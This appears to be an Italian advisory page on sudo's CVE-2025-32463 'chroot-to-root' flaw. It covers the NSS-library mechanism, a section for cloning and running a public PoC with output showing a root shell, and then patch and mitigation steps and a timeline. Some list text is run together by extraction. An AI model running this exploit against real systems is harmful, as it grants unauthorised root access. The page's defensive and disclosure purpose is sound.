
CVE-2025-32463

Escalation critica dei privilegi locali nel gestore privilegi Linux più utilizzato
Qualsiasi utente locale (anche senza permessi sudoers) potrebbe diventare root in secondi usando sudo -R
CVE-2025-32463 (noto anche come "chroot-to-root") è una vulnerabilità critica di escalation dei privilegi locali in sudo.
Consente a qualsiasi utente locale senza privilegi — anche a quelli non elencati in sudoers — di ottenere accesso root completo semplicemente usando l'opzione -R / --chroot.
Il difetto è stato introdotto in sudo 1.9.14 (giugno 2023) ed è esistito fino a 1.9.17p1 (giugno 2025). Non era un bug tradizionale ma un pericoloso effetto collaterale di come sudo gestiva la risoluzione dei percorsi all'interno di un chroot controllato dall'utente prima dei controlli delle policy.
Avviso Ufficiale Sudo: "Un attaccante può sfruttare l'opzione
-Rdi sudo per eseguire comandi arbitrari come root, anche se non è elencato nel file sudoers."
Verifica della realtà:
Il bug ha avuto origine da un cambiamento del 2023 nella logica di corrispondenza dei comandi di sudo:
-R /path, sudo chiama pivot_root() prima di valutare completamente la policy sudoers./etc/nsswitch.conf dall'interno del chroot./etc/nsswitch.conf malevolo (es., passwd: /woot1337)libnss_/woot1337.so.2 contenente un costruttore che viene eseguito come root.Intuizione chiave: L'opzione -R era consentita anche per utenti senza permessi sudo, rendendola un vettore di attacco perfetto.
Solo sudo 1.9.14 fino a 1.9.17 (prima di 1.9.17p1)
Ampiamente Affetti:
NON affetti:
Exploit one-liner (da Stratascale CRU):
# 1 – clone repo
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠ WARNING: CVE-2025-32463 EXPLOIT PoC ⚠
═══════════════════════════════════════════════════════════════
This script is for AUTHORIZED TESTING ONLY on systems you own.
Running on unauthorized systems is ILLEGAL.
Patch immediately after testing (sudo 1.9.17p1+).
[+] Creating temporary exploit stage...
[+] Compiling malicious NSS library...
[+] Triggering sudo -R ... (expect root shell)
(If successful, you'll drop into a root bash prompt)
[!] CVE-2025-32463 triggered - gaining root...
[+] You are now root!
┌──(root㉿kali)-[/]
└─# whoami
root
sudo -V | head -n 1
✅ Sicuro se 1.9.17p1 o successivo (o ≤ 1.9.13)
Debian/Ubuntu:
sudo apt update && sudo apt install --reinstall sudo
Fedora/RHEL:
sudo dnf update sudo
Arch:
sudo pacman -S sudo
Aggiungi a /etc/sudoers (o un file in /etc/sudoers.d/):
Defaults !use_chroot
Cerca e rimuovi eventuali righe CHROOT= o runchroot=.
Consiglio Pro 2026: Scansiona vecchie immagini Docker, runner CI e VM legacy — molte ancora contengono snapshot vulnerabili di sudo.
--chroot) possono diventare superficie d'attacco se non isolate.Questo incidente ha rafforzato la necessità del principio del minimo privilegio anche negli strumenti di sistema principali.
Stato a marzo 2026: ✅ Completamente mitigato su tutti i sistemi moderni • Funzionalità chroot deprecata • Ecosistema più sicuro
Fatto con ❤️ per gli amministratori Linux che hanno patchato prima del colpo del KEV
| Data | Evento |
|---|
| Giugno 2023 | rilasciato sudo 1.9.14 (bug introdotto) |
| 1 aprile 2025 | Rich Mirch segnala privatamente |
| 8 aprile 2025 | Assegnato CVE-2025-32463 |
| 9 giugno 2025 | Patch proposta |
| 30 giugno 2025 | Divulgazione pubblica + blog Stratascale + PoC completo |
| Luglio 2025 | rilasciato sudo 1.9.17p1; le principali distribuzioni spingono aggiornamenti |
| 29 settembre 2025 | Aggiunto al catalogo CISA KEV |
| 2026 | Funzionalità chroot completamente deprecata nell'ecosistema |